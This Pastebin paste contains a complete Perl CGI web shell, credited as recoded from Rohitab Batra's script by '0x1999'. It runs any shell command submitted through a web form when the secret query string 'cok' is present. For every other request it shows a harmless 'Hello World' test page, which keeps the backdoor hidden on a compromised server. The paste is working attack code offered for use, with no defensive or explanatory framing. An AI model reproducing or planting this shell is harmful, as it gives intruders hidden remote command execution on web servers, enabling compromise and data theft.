Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # Copyright (C) 2001 Rohitab Batra
- # Recoded By 0x1999
- my $melex = $ENV{'QUERY_STRING'};
- if ($melex eq "cok") {
- $WinNT = 0;
- $NTCmdSep = "&";
- $UnixCmdSep = ";";
- $CommandTimeoutDuration = 10;
- $ShowDynamicOutput = 1;
- $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
- $CmdPwd = ($WinNT ? "cd" : "pwd");
- $PathSep = ($WinNT ? "\\" : "/");
- $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
- sub ReadParse
- {
- local (*in) = @_ if @_;
- local ($i, $loc, $key, $val);
- $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
- if($ENV{'REQUEST_METHOD'} eq "GET")
- {
- $in = $ENV{'QUERY_STRING'};
- }
- elsif($ENV{'REQUEST_METHOD'} eq "POST")
- {
- binmode(STDIN) if $MultipartFormData & $WinNT;
- read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
- }
- # handle file upload data
- if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
- {
- $Boundary = '--'.$1; # please refer to RFC1867
- @list = split(/$Boundary/, $in);
- $HeaderBody = $list[1];
- $HeaderBody =~ /\r\n\r\n|\n\n/;
- $Header = $`;
- $Body = $';
- $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
- $in{'filedata'} = $Body;
- $Header =~ /filename=\"(.+)\"/;
- $in{'f'} = $1;
- $in{'f'} =~ s/\"//g;
- $in{'f'} =~ s/\s//g;
- # parse trailer
- for($i=2; $list[$i]; $i++)
- {
- $list[$i] =~ s/^.+name=$//;
- $list[$i] =~ /\"(\w+)\"/;
- $key = $1;
- $val = $';
- $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
- $val =~ s/%(..)/pack("c", hex($1))/ge;
- $in{$key} = $val;
- }
- }
- else # standard post data (url encoded, not multipart)
- {
- @in = split(/&/, $in);
- foreach $i (0 .. $#in)
- {
- $in[$i] =~ s/\+/ /g;
- ($key, $val) = split(/=/, $in[$i], 2);
- $key =~ s/%(..)/pack("c", hex($1))/ge;
- $val =~ s/%(..)/pack("c", hex($1))/ge;
- $in{$key} .= "\0" if (defined($in{$key}));
- $in{$key} .= $val;
- }
- }
- }
- sub PrintPageHeader
- {
- $EncodedCurrentDir = $CurrentDir;
- $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
- print "Content-type: text/html\n\n";
- print <<END;
- <html>
- <head>
- <title>0x1999</title>
- $HtmlMetaHeader
- </head>
- <body onLoad="document.f.@_.focus()" bgcolor="#0A0A0A" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
- <font color="#C0C0C0" size="3">
- END
- }
- sub PrintPageFooter
- {
- print "</font></body></html>";
- }
- sub GetCookies
- {
- @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
- foreach $cookie(@httpcookies)
- {
- ($id, $val) = split(/=/, $cookie);
- $Cookies{$id} = $val;
- }
- }
- sub PrintCommandLineInputForm
- {
- $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
- print <<END;
- <code>
- <form name="f" method="POST" action="?cok">
- <input type="hidden" name="a" value="command">
- <input type="hidden" name="d" value="$CurrentDir">
- $Prompt
- <input type="text" name="c">
- <input type="submit" value="Enter">
- </form>
- </code>
- END
- }
- sub CommandTimeout
- {
- if(!$WinNT)
- {
- alarm(0);
- print <<END;
- </xmp>
- <code>
- Command exceeded maximum time of $CommandTimeoutDuration second(s).
- <br>Killed it!
- <code>
- END
- &PrintCommandLineInputForm;
- &PrintPageFooter;
- exit;
- }
- }
- sub ExecuteCommand
- {
- if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
- {
- # we change the directory internally. The output of the
- # command is not displayed.
- $OldDir = $CurrentDir;
- $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
- chop($CurrentDir = `$Command`);
- &PrintPageHeader("c");
- $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
- print "<code>$Prompt $RunCommand</code>";
- }
- else # some other command, display the output
- {
- &PrintPageHeader("c");
- $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
- print "<code>$Prompt $RunCommand</code><xmp>";
- $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
- if(!$WinNT)
- {
- $SIG{'ALRM'} = \&CommandTimeout;
- alarm($CommandTimeoutDuration);
- }
- if($ShowDynamicOutput) # show output as it is generated
- {
- $|=1;
- $Command .= " |";
- open(CommandOutput, $Command);
- while(<CommandOutput>)
- {
- $_ =~ s/(\n|\r\n)$//;
- print "$_\n";
- }
- $|=0;
- }
- else # show output after command completes
- {
- print `$Command`;
- }
- if(!$WinNT)
- {
- alarm(0);
- }
- print "</xmp>";
- }
- &PrintCommandLineInputForm;
- &PrintPageFooter;
- }
- &ReadParse;
- &GetCookies;
- $ServerName = $ENV{'SERVER_NAME'};
- $RunCommand = $in{'c'};
- $TransferFile = $in{'f'};
- $Options = $in{'o'};
- $Action = $in{'a'};
- $Action = "command" if($Action eq "");
- $CurrentDir = $in{'d'};
- chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
- if($Action eq "command") # user wants to run a command
- {
- &ExecuteCommand;
- }
- }
- else
- {
- print "Content-type: text/html\n\n";
- print "<title>Test CGI</title>\n";
- print "<h1>Hello World !!</h1>\n";
- exit;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement